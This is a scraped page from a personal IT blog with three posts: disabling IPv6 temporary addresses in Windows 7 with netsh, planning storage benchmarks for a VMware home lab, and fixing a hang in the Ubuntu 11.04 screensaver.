Many operating systems use the EUI-64 algorithm to generate IPv6 addresses. This algorithm derives the last 64 bits of the IPv6 address using the MAC address. Many see this as a privacy problem. The last half of your IP address will never change, and with MAC addresses being somewhat unique, the interface ID becomes close to a unique “cookie” identifying your system.

As a result, RFC3041 introduces “privacy enhanced” addresses which will change and are created by hashing the MAC address.

*NOTE: Default behaviour of Windows XP & Server 2003 does not use the randomization*

What this means from an administration perspective is that after every reboot, the IPv6 address that is presented to the network changes ….. which makes things like DNS / FW rules etc a nightmare to manage in a corporate / enterprise scenario where you really need to be able to have a stable addressing scheme.

I have a /52 IPv6 subnet through a tunnel broker. My border firewall terminates the tunnel & advertises the subnet on the inside interface for autoconfiguration (without having to configure DHCP)

So, lets break it down.

I get a /52 subnet, which is advertised to my internal machines.

aaaa:bbbb:cccc:dddd::/56

In normal configuration, by default in Windows 7 – it generates a randomized Link-local address (not based on the MAC)

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
Link-local IPv6 Address . . . . . : fe80::d95:67db:fba2:7dad%11(Preferred)

Using stateless autoconfiguration I get an IPv6 address from my FW, based on the Link-local address

IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:d95:67db:fba2:7dad(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

However, Windows isnt done yet, it also assigns a Temporary IPv6 address – which is used when accessing network resources. This Temporary address is only kept for a set period, and changes when the machine reboots – and here is the problem. How can I configure a firewall rule for this host to reach an external resource ?

Here is the result of several reboots:

Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:ec65:b6ca:abd6:1349
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:752b:87c:f84:a4d6
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:1031:46fd:cfd7:d88c
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:5883:7ef2:9c64:6eab
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a400:251a:59:1cd6:bf0f

You can disable this & just use the interface based EUI-64 address by running the following commands.

Bring up a command prompt in administrator mode (Start -> All Programs -> Accessories -> Right click on Command Prompt, run as Administrator)

Then run these commands (should get OK response)

netsh interface ipv6 set privacy state=disabled store=active
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=active
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent

Restart your machine

Your machine should now get a stable IPv6 address based on the MAC address. You can now use this MAC address for DNS entries, FW rules etc & it’s access will remain consistent across reboots.

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a(Preferred)
Link-local IPv6 Address . . . . . : fe80::20c:29ff:fe88:9f2a%10(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

A note on the addressing – In this addressing mode, the 64-bit interface identifier is derived from its 48-bit MAC address. A MAC address 00:1D:BA:06:37:64 is turned into a 64-bit EUI-64 by inserting FF:FE in the middle: 00:1D:BA:FF:FE:06:37:64. As I “only” have a /52 assigned to me the whole MAC is not used, but the address is based on the last 5 octets.

Comments : Leave a Comment »
Tags: Autoconfiguration, EUI-64, ipv6, link-local, RFC3041, windows, windows7
Categories : firewall, security, windows

bigger, better, faster, more VMware

19 07 2011

No, before we even start, this is not a blog post about the 4 Non Blondes album.

This is a documentation of my mind numbing, soul destroying search for the best performing configuration with the hardware I have in my lab.

I have spent countless hours / days / weeks building, breaking & rebuilding my VM Lab (thankfully I have an understanding wife & daughter).

Hardware primarily consists of:

2x HP Proliant N36L Microservers (Athlon II Neo Dual Core 1.3) (8GB RAM in one box / 2GB in the other).
2x HP DC7100 Desktops (P4 2.8 / 2GB RAM)
1x Dell Precision 370 (P4 3.0 / 4GB RAM)
Cisco 2950 (24×10/100 + 2×1000)

Add to this an assortment of older F5′s / dual P3 pizza boxes & other no name kit – and I have a playground full of toys.

I have been using unRAID for the past few years on various hardware platforms. This has been mainly for storing media, ISO’s & providing a backup target for the various laptops & workstations around the house.

Recently I picked up the two HP N36L Microservers, the 8GB one is my primary VMware ESXi 4.1 host and the 2GB server is running unRAID. Just having the second box sitting there running unRAID seems a little under-utilised to me, the disks are in standby most of the time (thanks to netflix) – and it just hasnt been getting the workout I think it deserves.

So – enter the newest project – whats the best solution for storing media / ISO’s / Backups / VMs etc – I want to be able to use either iSCSI or NFS to play with vMotion of VMs when I finish building my VMware test lab to finish my VCP – I want it fast, but I want it protected in case a disk fails.

I have tested & played with the following in my quest:

Storage Systems:
FreeNAS 7 & 8 (Physical & Virtual)
Openfiler (Physical & Virtual)
Nexenta (Physical & Virtual)
unRAID Physical (Virtual not supported due to USB GUID licensing)

Presentation to Client Machines:
Local storage in the ESXi host presented to Windows 7 VM
iSCSI Raw Device Mappings presented to Windows 7 VM
iSCSI Presented to ESXi -> VMFS-3 filesystem -> VMDK presented to Windows 7 VM
iSCSI Presented to Physical Windows 7 Client
NFS Presented to ESXi -> VMDK presented to Windows 7 VM
CIFS/SMB Presented to Physical Windows 7 Client

I have been using a single test scenario on each config – using Iometer – with the file & results formatted from http://vmktree.org/iometer/

First I want to benchtest them for performance, then to setup the best solution that is a mix of performance & redundancy.

Sounds impossible – im gonna try.

For the performance benchtesting – I decided to go with a 2 spindle ZFS striped config, tested from Windows 7 Clients
Physical Client: HP DC7100
Physical FreeNAS: HP N36L(2GBRAM / 1TB WD Green / 2TB WD Green )

I have mismatched sizes as thats the hardware I have free at the moment. If I find a compelling reason why this wont work, then I may get a second 2TB disk to match. I am using WD Green disks for their low power / cooler running – comodity hardware.

Scenario 1 – Physical FreeNAS 7 with iSCSI
Physical Client -> iSCSI on Physical NAS
Virtual Client -> VMDK on ESXi -> iSCSI Physical NAS

Scenario 2 – Physical FreeNAS 7 with NFS & CIFS/SMB
Physical Client -> CIFS/SMB on Physical NAS (Usual windows sharing type scenario)
Virtual Client -> VMDK on ESXi -> NFS Physical NAS

Scenario 3 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 4 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 5 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 6 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

I will be adding follow up posts with the performance results, the PRO’s & CON’s (in my view) with each of these scenarios. Feel free to add comments & kick off discussions about this project.

Comments : Leave a Comment »
Tags: esxi, freenas, iscsi, linux, nexenta, nfs, openfiler, RDM, smb, storage, unraid, vmdk, vmkfstools, vmware, windows, windows7
Categories : storage, unraid, vmware, windows

ubuntu 11.04 natty screensaver hang issue

31 05 2011

Since upgrading to Ubuntu 11.04 I have been plagued by the dreaded locking screensaver / login / desktop issue after a period of time when the screensaver or blank screen is on. The symptoms of this are the screensaver appears to freeze without giving you the login box to enter your password, you can still move the mouse, you can still switch to a text console session.

This bug appears to be tracking it: https://bugs.launchpad.net/ubuntu/+source/gnome-screensaver/+bug/762918

A combination of killing gnome-screensaver & disabling VBlank in Compiz seems to have done the trick for me.

Putting this up here for anyone else who may be seeing this issue, hope it helps.

I switch to a console session using Ctrl+Alt+F1 & kill the gnome-screensaver

sudo killall gnome-screensaver

Switch back to X using Crtl+Alt+F7 & see if this fixed it & you can login again.

If not, you may also need to kill Compiz (I did)

sudo killall -w -s KILL compiz

Once back in gnome – you need to install the CompixConfig Settings Manager

sudo apt-get install compizconfig-settings-manager

Launch the compizconfig-settings-manager (Launcher, type compiz & click on the App) – then disable (Uncheck) the OpenGL option to “Sync to VBlank” under General / OpenGL

Doing this seems (fingers crossed, your mileage may vary) the problem.

Comments : Leave a Comment »

Categories : uncategorized

adventures {in}security

VM BIOS Boot Delay

P2V the VMware way

identify & crack your WPS enabled AP

Grrr – VMWare NICs !!!

HowTo: recover a wiped Cisco Catalyst

WPA2 network cracking

When SIEM goes bad …

Disable Windows 7 IPv6 random temporary addresses

bigger, better, faster, more VMware

ubuntu 11.04 natty screensaver hang issue

looking for something ?

recentposts

tags

archive

me

otherblogs

podcasts

tidbits

sign me up

Follow “adventures {in}security”